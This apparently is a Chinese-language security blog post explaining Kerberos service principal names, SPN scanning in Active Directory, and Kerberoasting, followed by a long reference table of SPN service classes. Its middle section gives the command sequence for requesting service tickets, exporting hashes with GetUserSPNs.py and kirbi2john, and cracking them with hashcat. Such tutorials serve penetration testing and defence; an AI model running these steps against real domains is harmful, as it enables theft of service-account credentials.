发布于2022年11月5日3年前 0x01 SPN定义 服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。如果客户端可能使用多个名称进行身份验证,则给定的服务实例可以具有多个SPN。例如,SPN总是包含运行服务实例的主机名称,所以服务实例可以为其主机的每个名称或别名注册一个SPN。 0x02 SPN扫描 spn扫描也可以叫扫描Kerberos服务实例名称,在Active Directory环境中发现服务的最佳方法是通过“SPN扫描”。通过请求特定SPN类型的服务主体名称来查找服务,SPN扫描攻击者通过网络端口扫描的主要好处是SPN扫描不需要连接到网络上的每个IP来检查服务端口。SPN扫描通过LDAP查询向域控制器执行服务发现。由于SPN查询是普通Kerberos票据的一部分,因此如果不能被查询,但可以用网络端口扫描来确认。 1.SPN格式 SPN = serviceclass “/” hostname [“:”port] [“/” servicename] serviceclass = mssql servicename =sql.bk.com 其中: serviceclass:标识服务类的字符串,例如Web服务的www hostname:一个字符串,是系统的名称。这应该是全限定域名(FQDN)。 port:一个数字,是该服务的端口号。 servicename:一个字符串,它是服务的专有名称(DN),objectGuid,Internet主机名或全限定域名(FQDN)。 注意: 服务类和主机是必需参数,但 端口和服务名是可选的,主机和端口之间的冒号只有当端口存在时才需要 2.常见服务和spn服务实例名称 MSSQLSvc/adsmsSQLAP01.adsecurity.org:1433 Exchange exchangeMDB/adsmsEXCAS01.adsecurity.org RDP TERMSERV/adsmsEXCAS01.adsecurity.org WSMan / WinRM / PS Remoting WSMAN/adsmsEXCAS01.adsecurity.org Hyper-V Host Microsoft Virtual Console Service/adsmsHV01.adsecurity.org VMWare VCenter STS/adsmsVC01.adsecurity.org 2.SPN扫描的ps脚本 发现mssql服务中的spn服务实例名称: https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers 其他的SPN服务实例名查询: https://github.com/PyroTek3/PowerShell-AD-Recon 由于每台服务器都需要注册用于Kerberos身份验证服务的SPN,因此这为在不进行端口扫描的情况下收集有关环境的信息提供了一个完美的方法。 例如: 管理员在名为“MetcorpKCS17”的服务器上安装和配置Microsoft SQL Server,并使用侦听端口3170 3&3171的SQL实例。 那么服务类和实例名称产生是这样的: MSSQLSvc/MetcorpKCS17.adsecurity.org:3170MSSQLSvc/MetcorpKCS17.adsecurity.org:3171 蓝色的部分是服务类,橙色的部分是计算机的FQDN,绿色的最后一部分是网络端口号由于Kerberos将SPN请求与目录中的现有SPN相匹配,因此最后的数字不一定是服务在服务器上侦听的端口。如上所述,大多数情况下SPN中记录的端口是服务器上的监听端口,并非所有的SPN都包含一个端口。现在,我们有一个更好的方法来发现Active Directory域或森林中的SQL服务器:ServicePrincipalName=MSSQL* 0x03 SPN扫描和破解TGS Tickets 以MSSQL服务配置SPN为例 参考配置地址: https://technet.microsoft.com/zh-cn/library/bb735885.aspx 1.为 SQL Server 服务帐户注册SPN 手动注册: setspn -A MSSQLSvc/myhost.redmond.microsoft.com:1433 accountname 对应的命名实例: setspn -A MSSQLSvc/myhost.redmond.microsoft.com/instancename accountname 2.查看用户对应的SPN: setspn -L ruos\sql-service 3.使用ADSI(adsiedit.msc)查看用户属性 4. 在AD上为用户指定服务登陆权限。 GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment Log on as a service 5..更改 SQL Server 服务帐户为域用户帐户 6.暴力破解Kerberos TGS Tickets 由于加密类型是RC4_HMAC_MD5,Kerberos协议第四步TGS-REP将会返回用服务帐户的NTLM密码哈希加密的票据。 7.SPN扫描 setspn -T domain -q */* 或者 https://github.com/PyroTek3/PowerShell-AD-Recon/ 8.请求SPN Kerberos Tickets PS C:\> Add-Type -AssemblyName System.IdentityModel PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/WEBTST01.ruos.org/SQLEXPRESS" 9. 查看并导出票据 默认配置加密类型是aes256_hmac,tgsrepcrack无法破解,可在服务器组策略指定加密类型为RC4_HMAC_MD5。 GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options Network security: Configure encryption types allowed for Kerberos 10.离线破解 tgsrepcrack(仅对RC4_HMAC_MD5),或者保存hash使用hashcat破解。 导出hash(用于其他加密类型) GetUserSPNs.py -request -outputfile hash.txt -dc-ip 192.168.6.2 ruos.org/user2 或者从票据中导出 kirbi2john.py 1-40a00000-user2@MSSQLSvc~WEBTST01.ruos.org~SQLEXPRESS-RUOS.ORG.kirbi S2. hashcat64.exe -m 13100 hash.txt example.dict –force 也可以参考其他破解工具如下: https://github.com/nidem/kerberoast https://github.com/coresecurity/impacket https://github.com/nidem/kerberoast/blob/master/kirbi2john.py 0x04 Active Directory服务主体名称(SPN)的综合参考表 AcronisAgent:针对Acronis备份和数据恢复软件 AdtServer:带有ACS的Microsoft System Center Operations Manager(2007/2012)管理服务器 afpserver:Apple归档协议 AgpmServer:Microsoft高级组策略管理(AGPM) aradminsvc - 任务主角色服务器 arssvc - 任务主角色服务器 bocms:商业化CMS BOSSO:商业对象 CESREMOTE:与VMWare上的Citrix VDI解决方案有关,许多VDI工作站都有这个SPN。 cifs:通用Internet文件系统 CmRcService:Microsoft系统中心配置管理器(SCCM)远程控制 CUSESSIONKEYSVR:Cisco Unity VOIP系统 cvs:CVS库 Dfsr *:分布式文件系统 DNS:域名服务器 E3514235-4B06-11D1-AB04-00C04FC2DCD2:NTDS DC RPC复制 E3514235-4B06-11D1-AB04-00C04FC2DCD2-ADAM:ADAM实例 EDVR:ExacqVision服务 exchangeAB:Exchange通讯簿服务(通常是支持NSPI的域控制器,也通常是所有的GC) exchangeMDB:RPC客户端访问服务器角色 exchangeRFR:交换通讯簿服务 fcsvr:Apple Final Cut Server FileRepService:WSFileRepService.exe FIMService:Microsoft Forefront标识管理器(FIM) ftp:文件传输协议 GC:域控制器全局编录服务 HDFS:Hadoop(Ambari) host:主机服务代表主机。HOST SPN用于在创建服务票据时访问由Kerberos协议使用长期密钥的主机帐户。 http:支持Kerberos身份验证的http网络服务的SPN Hyper-V副本服务:Microsoft Hyper-V的副本服务 IMAP:Internet消息访问协议 IMAP4:Internet消息访问协议版本4 ipp:Internet打印协议 iSCSITarget:iSCSI 配置 kadmin:Kerberos ldap:LDAP服务,如域控制器或ADAM实例。 Magfs:Maginatics MagFS mapred:Cloudera Microsoft虚拟控制台服务:HyperV主机 Microsoft虚拟系统迁移服务:P2V支持(Hyper-V) mongod:MongoDB Enterprise mongos:MongoDB Enterprise MSClusterVirtualServer:Windows群集服务器 MSOLAPSvc:SQL Server分析服务 MSOLAPSvc.3:SQL Server分析服务 MSOLAPDisco.3:SQL Server分析服务 MSOMHSvc:Microsoft系统中心运营经理(2007/2012)管理服务器 MSOMSdkSvc:Microsoft System Center Operations Manager(2007/2012)管理服务器 MSServerCluster:Windows群集服务器 MSServerClusterMgmtAPI:此群集API需要此SPN才能通过使用Kerberos向服务器进行身份验证 MSSQL:Microsoft SQL Server MSSQLSvc:Microsoft SQL Server MSSQL $ ADOBECONNECT:支持Adobe Connect的Microsoft SQL Server MSSQL $ BIZTALK:Microsoft SQL Server支持Microsoft Biztalk服务器 MSSQL $ BUSINESSOBJECTS:支持Business Objects的Microsoft SQL Server MSSQL $ DB01NETIQ:支持NetIQ的Microsoft SQL Server nfs:网络文件系统 NPPolicyEvaluator:戴尔Quest审计员 NPRepository 4(CHANGEAUDITOR):戴尔Quest Change Auditor NPRepository4(CAAD):戴尔Quest审核员 NPRepository4(默认):戴尔任务审计员 NtFrs *:NT文件复制服务 oracle:Oracle Kerberos身份验证 pcast:苹果播客制作人 PCNSCLNT:自动密码同步解决方案(MIIS 2003&FIM) POP:邮箱协议 POP3:邮箱协议版本3 PVSSoap:Citrix Provisioning Services(7.1) RestrictedKrbHost:使用服务类字符串等于“RestrictedKrbHost”的 SPN的服务类,其服务凭单使用计算机帐户密钥并共享会话密钥。 RPC:远程过程调用服务 SAP:SAP / SAPService <SID> SAS:SAS服务器 SCVMM:System Center虚拟机管理器 secshd:IBM InfoSphere sip:会话启动协议 SMTP:简单邮件传输协议 SMTPSVC:简单邮件传输协议 SoftGrid: Microsoft应用程序虚拟化(App-V)以前的“SoftGrid” STS:VMWare SSO服务 SQLAgent $ DB01NETIQ:NetIQ的SQL服务 tapinego:与路由应用程序相关联,例如Microsoft防火墙(ISA,TMG等) TERMSRV:Microsoft远程桌面协议服务,又名终端服务。 tnetd:Juniper Kerberos身份验证 “Tnetd是一个守护进程,用于路由引擎和数据包转发引擎等不同组件之间的内部通信” vmrc:Microsoft Virtual Server 2005 vnc:VNC服务器 VPN:虚拟专用网络 VProRecovery Backup Exec系统恢复代理7.0 VProRecovery Backup Exec系统恢复代理8.0 VProRecovery Backup Exec系统恢复代理9.0 VProRecovery诺顿克隆代理12.0 VProRecovery诺顿 克隆代理14.0 VProRecovery诺顿克隆代理15.0 VProRecovery Symantec系统恢复代理10.0 VProRecovery Symantec系统恢复代理11.0 VProRecovery Symantec系统恢复代理14.0 vssrvc:微软虚拟服务器(2005) WSMAN:Windows远程管理(基于WS-Management标准)服务 xmpp / XMPP:可扩展消息和呈现协议(Jabber) xgrid:苹果的分布式(网格)计算 / Mac OS X 10.6服务器管理 YARN:Cloudera MapReduce 注意: 域控制器自动将公共SPN映射到主机SPN中。计算机加入到域时,主机SPN自动添加到所有计算机帐户的ServicePrincipalName属性。域控制器SPN映射由SPNMappings中的以下位置中的属性控制: “CN=Directory Service,CN=WindowsNT,CN=Services,CN=Configuration SPN自动映射到HOST(SPNMapping属性值): alerter appmgmt cisvc clipsrv browser dhcp dnscache replicator eventlog eventsystem policyagent oakley dmserver dns mcsvc fax msiserver ias messenger netlogon netman netdde netddedsm nmagent plugplay protectedstorage rasman rpclocator rpc rpcss remoteaccess rsvp samss scardsvr scesrv seclogon scm dcom cifs spooler snmp schedule tapisrv trksvr trkwks ups time wins www http w3svc iisadmin msdtc
创建帐户或登录后发表意见